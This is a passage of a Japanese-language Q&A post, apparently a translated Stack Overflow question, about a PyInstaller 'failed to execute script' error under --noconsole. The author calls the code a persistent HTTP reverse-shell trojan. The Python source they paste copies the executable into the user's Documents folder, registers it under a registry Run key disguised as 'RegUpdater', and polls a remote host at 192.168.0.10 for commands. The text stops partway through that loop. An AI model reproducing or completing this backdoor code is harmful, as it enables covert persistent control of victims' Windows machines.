--noconsoleオプションを使用したPyinstallerの「スクリプトの実行に失敗しました」エラー
私はPyinstallerのすべてのデバッグ手順を実行しましたが、ここでちょっとしたことをしているので、これに目を向けています。 いくつかの簡単なカスタムペンテストツールを作成してPython3に切り替えようとしています。現在、永続的なHTTPリバースシェルトロイの木馬を作成しています。完全なコードは次のとおりです。 import requests import subprocess import time import os import shutil import winreg path = os.getcwd().strip('\n') null,userprof = subprocess.check_output('set USERPROFILE', shell=True).split(b'=') destination = str(userprof.decode().strip('\n\r')) + '\\Documents\\' + 'persistence.exe' if not os.path.exists(destination): shutil.copyfile(path + '\persistence.exe', str(destination)) key = winreg.OpenKey(winreg.HKEY_CURRENT_USER,"Software\Microsoft\Windows\CurrentVersion\Run",0,winreg.KEY_ALL_ACCESS) winreg.SetValueEx(key,'RegUpdater',0,winreg.REG_SZ,destination) key.Close() while True: req = requests.get('http://192.168.0.10') command = req.text if …